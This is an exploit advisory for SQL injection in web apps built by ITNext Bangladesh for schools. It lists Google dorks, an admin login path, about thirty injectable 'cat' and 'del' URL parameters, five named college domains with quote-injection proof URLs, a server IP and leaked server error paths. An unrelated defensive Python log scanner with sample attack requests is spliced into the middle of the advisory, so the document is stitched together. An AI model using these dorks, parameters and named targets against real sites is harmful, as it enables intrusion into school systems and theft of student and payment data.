###################################################################
# Exploit Title : Powered By ITNext Bangladesh Solutions Limited SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : itnext.com.bd ~ edu-bd.org
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''This is Web-App Not Only A Website!!! Powered By ITNext>>'' site:edu.bd
intext:''Powered By ITNext>>'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-itnext-bangladesh-solutions-limited-sql-injection.html
###################################################################
# Admin Panel Login Path :
*************************
/index.php?cat=quicklink&del=login
# SQL Injection Exploits :
***********************
/admission/index.php?cat=[SQL Injection]
/index.php?cat=quicklink&del=[SQL Injection]
/index.php?cat=Home&del=[SQL Injection]
/index.php?cat=Principal&del=[SQL Injection]
/index.php?cat=Vice%20Principal&del=[SQL Injection]
/index.php?cat=Teachers&del=[SQL Injection]
/index.php?cat=Students&del=[SQL Injection]
/index.php?cat=Brief%20History&del=[SQL Injection]
/index.php?cat=Tuition%20Fees&del=[SQL Injection]
/index.php?cat=Attendence&del=[SQL Injection]
/index.php?cat=List%20of%20Holiday&del=[SQL Injection]
/index.php?cat=Class%20Schedule&del=[SQL Injection]
/index.php?cat=Academic%20Calander&del=[SQL Injection]
/index.php?cat=Admission%20Fees&del=[SQL Injection]
/index.php?cat=Admission%20Open&del=[SQL Injection]
/index.php?cat=Laboratory&del=[SQL Injection]
/index.php?cat=Computer%20Lab&del=[SQL Injection]
/index.php?cat=College%20Library&del=[SQL Injection]
/index.php?cat=ACADEMIC&del=[SQL Injection]
/index.php?cat=ADMISSION&del=[SQL Injection]
/index.php?cat=Check%20Dues&del=[SQL Injection]
/index.php?cat=Online%20Payments&del=[SQL Injection]
/index.php?cat=News%20Corner&del=[SQL Injection]
/index.php?cat=Notice%20Board&del=[SQL Injection]
/index.php?cat=Photo%20Gallery&del=[SQL Injection]
/index.php?cat=Email%20Us&del=[SQL Injection]
/index.php?cat=Find%20Us&del=[SQL Injection]
###################################################################
# Example Vulnerable Sites =>
***************************
Note => (107.155.116.175) => There are 14 domains hosted on this server.
[+] mohsincollege.edu.bd/index.php?cat=quicklink&del=1%27
=> [ Proof of Concept for SQL Injection ] => archive.vn/xBSoT
[+] ramucollege.edu.bd/admission/index.php?cat=1'
[+] bakoliagovcollege.edu.bd/index.php?cat=quicklink&del=1%27
[+] pol-inst-cmp.edu.bd/index.php?cat=quicklink&del=1%27
[+] cgc.edu.bd/index.php?cat=quicklink&del=1%27
###################################################################
# SQL Database Error :
*********************
Warning: include(pages/1'.php): failed to open stream: No such file or directory in /home/mcollege/public_html/index.php on line 426
Warning: include(): Failed opening 'pages/1'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mcollege/public_html/index.php on line 426
Warning: mysql_connect(): Access denied for user 'root'@'localhost' (using password: YES) in /home/ramucollege/public_html/admission/db_connect.php on line 22
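For defenders running one of these sites, here is an added example (not part of the advisory, not ITNext code) of a small log scanner that flags requests hitting the `cat` and `del` parameters of `index.php` with SQL metacharacters. The access-log lines, client IPs and the marker list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); hosts and IPs are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jan/2019:10:00:01 +0600] "GET /index.php?cat=quicklink&del=login HTTP/1.1" 200 4120
10.0.0.7 - - [08/Jan/2019:10:00:09 +0600] "GET /index.php?cat=quicklink&del=1%27 HTTP/1.1" 200 512
10.0.0.7 - - [08/Jan/2019:10:00:15 +0600] "GET /admission/index.php?cat=1' HTTP/1.1" 200 498
10.0.0.9 - - [08/Jan/2019:10:01:30 +0600] "GET /index.php?cat=Photo%20Gallery&del=3 HTTP/1.1" 200 9981
10.0.0.7 - - [08/Jan/2019:10:02:00 +0600] "GET /index.php?cat=Students&del=1%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 600
"""

# Combined log format: client IP, timestamp, request line, status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# The two parameters the advisory names as injection points.
WATCHED_PARAMS = ("cat", "del")
# Cheap SQL-injection indicators: quotes, comment openers and a few common keywords (assumed list).
SQLI_MARKERS = re.compile(r"""['"]|--|/\*|\b(?:union|select)\b|\b(?:sleep|benchmark)\s*\(""", re.I)

def suspicious_params(target):
    """Return [(name, value)] for watched parameters whose decoded value carries SQLi markers."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes one layer; unquote again so %2527-style double encoding is also caught.
        if name in WATCHED_PARAMS and SQLI_MARKERS.search(unquote(value)):
            hits.append((name, value))
    return hits

def scan_log(text):
    """Return one alert dict per request to an index.php that trips suspicious_params()."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if not urlsplit(target).path.endswith("/index.php"):
            continue
        hits = suspicious_params(target)
        if hits:
            alerts.append({"ip": m.group("ip"), "path": urlsplit(target).path, "params": hits})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Requests 2, 3 and 5 of the sample are flagged; the legitimate `quicklink&del=login` and `Photo Gallery` requests are not.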
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################